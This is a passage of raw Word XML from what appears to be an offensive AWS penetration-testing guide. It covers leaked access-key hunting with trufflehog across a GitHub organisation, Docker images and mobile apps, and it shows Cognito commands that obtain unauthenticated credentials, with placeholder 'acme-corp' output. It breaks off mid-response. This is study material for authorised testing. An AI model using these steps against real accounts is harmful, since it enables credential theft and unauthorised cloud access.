          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>flags trust policies that take session-tag input without sufficient protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8C26D1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB9C863" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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first five commands (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>get-caller-identity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>get-account-authorization-details</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>describe-organization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, region list, per-region inventory) establish baseline truth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B495B1A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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CloudFox's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>all-checks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> produces a prioritized attack-path list you can read in 10 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6838C5D1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Pacu's enumeration modules are the exploit-ready complement to CloudFox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6509C6CE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ScoutSuite and Prowler give you a blue-team-language view of the same issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431CAB8C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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PMapper draws the "who becomes whom" graph that drives Chapter 8.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEDE41D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="1394238299"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Reconnaissance and Initial Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A550699"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Initial Access Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEB0228" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:spacing w:before="240" w:after="48"/>
        <w:outlineLvl w:val="4"/>
        <w:divId w:val="1202136655"/>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04BEABED" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="1202136655"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Walk through the six initial-access classes most productive in 2026: leaked access keys in source and artifacts, SSRF into IMDS, phishing of federated console users, OAuth app compromise, stolen developer workstation caches, and device-code phishing against IAM Identity Center. For each, cover detection, tooling, and the pivot into an authenticated session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D64C16" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="lead"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial access is the single most consequential step in an AWS engagement, because everything downstream assumes credentials. It is also the one step where the offensive industry has learned to outpace defender tooling. Scanning GitHub for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AKIA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> patterns is not 2016 tradecraft — it is 2026 tradecraft, because developers still leak keys, CI systems still echo secrets, and mobile apps still ship with baked-in roles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3531A92E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>6.1  Leaked access keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D34249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An AWS access key ID is a 20-character uppercase-alphanumeric string that begins with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AKIA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (long-term key) or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ASIA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (short-term session). The secret is a 40-character base64-ish string. These patterns are perfectly regex-able, and the ecosystem of tools around them is mature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646CE815" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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trufflehog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — scans filesystems, git repositories (including history), Docker images, S3 buckets, GitHub organizations, GitLab organizations, and PostgreSQL databases for credentials. Verified mode actively tests each finding with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:GetCallerIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, eliminating false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41105A0D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — fast local scanner focused on git history. Useful as a pre-commit hook on the defender side and as a forensic sweep tool on the offensive side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5B7832" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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noseyparker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — high-performance multi-pattern scanner; the author finds it best-in-class for multi-gigabyte archive sweeps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1ED6F9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ghe-tools / GH code search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — GitHub's code search supports regex; a search for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"AKIA" AND "wJalr"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> across a company's public repos routinely returns live keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2A133C"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operator@kali:~/recon$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>trufflehog filesystem --directory=./acme-checkout --only-verified --json | jq '.DetectorName, .Raw'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2230932E"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"AWS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8B0FE5"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"AKIAEXAMPLEACMESTAGE"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEDA945"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"AWS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6183972D"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"AKIAEXAMPLEACMEDEVCI"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104B94C2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># two verified-live AWS keys recovered from a repository clone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E96902C"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operator@kali:~/recon$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>trufflehog github --org=acme-corp --only-verified --include-detectors=AWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3125BC94" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:spacing w:before="216" w:after="216"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>[trufflehog] scanning 341 repositories (pre-2020 history included)...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC05661"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found: AKIA... in acme-corp/legacy-billing-svc / commit 3f7a1b2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BE8E32"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found: AKIA... in acme-corp/ios-app / commit 2c9d08e (tag v1.3.4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0961EE88"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found: AKIA... in acme-corp/terraform-modules / commit 8a1f44c (historical, revoked?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D088D22"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2 of 3 verified live via GetCallerIdentity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1B0DE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Verified-live output also identifies the owning account and the principal, which feeds directly into the Chapter 5 workflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F0DB0A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>6.2  Keys in Docker images</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370FE81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Docker images on Docker Hub, Amazon ECR Public, GitHub Container Registry, and GitLab Container Registry are a distinct leak source. Developers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>COPY .env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> into their image during a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> build, never delete the resulting layer, and push the image publicly. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>trufflehog docker --image &lt;url&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> extracts every layer and scans each for secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7847DC46" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>6.3  Keys in mobile applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DA576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Mobile apps frequently contain AWS keys or Cognito identity-pool IDs that can be used to obtain STS sessions. Procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E58BCF4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Download the APK / IPA (e.g., from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>apkpure.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or directly from the store).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5593B6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Decompile with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>apktool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Android) or unpack the IPA (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>unzip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> then inspect the binary with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>class-dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57109A5D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Grep decompiled source for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AKIA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ASIA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cognito-identity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>secretsmanager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FEB555" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Attempt a Cognito unauthenticated sign-in against the discovered identity pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707F45A8"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operator@kali:~/ios$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">aws cognito-identity get-id --identity-pool-id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>us-east-1:abcd1234-abcd-abcd-abcd-abcdef123456</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> --no-sign-request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA03EAF"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{"IdentityId":"us-east-1:ffffefff-eeee-dddd-cccc-bbbbbbbbbbbb"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679194C4"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operator@kali:~/ios$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws cognito-identity get-credentials-for-identity --identity-id us-east-1:ffffefff... --no-sign-request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57051132"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{"Credentials":{"AccessKeyId":"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
